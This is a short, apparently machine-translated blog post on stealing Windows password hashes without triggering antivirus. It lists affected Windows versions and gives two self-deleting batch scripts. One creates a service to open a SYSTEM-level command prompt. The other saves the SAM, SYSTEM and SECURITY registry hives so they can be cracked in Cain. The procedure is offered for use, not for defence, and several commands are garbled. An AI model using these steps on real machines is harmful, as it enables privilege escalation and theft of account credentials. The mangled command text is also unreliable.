I saw an article about exporting the Registry to break the password forever. This is a good news for a lot of hash-grabbing tools that have been killed and won't be killed by yourself, in fact, this was a long time ago. It seems that it was proposed by a foreigner, but it did not attract attention.
The author said that this method is not kill:
Windows 2000 SP4 (admin) = access denied
Windows XP SP2 (admin) = access denied
Windows XP SP3 (admin) = access denied
Windows 2003 R2 SP2 (admin) = works
Windows Vista SP2 (UAC/admin) = works
Windows 2008 SP1 (admin) = works
Windows 7 (UAC/admin) = works
There are requirements on user permissions. By default, XP SP3 cannot be exported. I tested it locally, but the system permission is acceptable. Then we can create a CMD with the system permission to run, and then export it.
You have not tested other systems.
First, create a CMD for executing the system permission:
================================== StartSystemCmd. bat ==========
SC Create systemcmd binPath = "cmd/K start" type = own type = interact
SC start systemcmd
SC delete systemcmd
Del % 0
========================================================== ==========
Then export the file.
========================== SaveReg. bat ====================================
@ Echo off
Reg save hklmsam sam. hive
Reg save hklmsystem system. hive
Reg save hklmsecurity security. hive
Del % 0
============================================================ ============
And then pour it into the CAIN.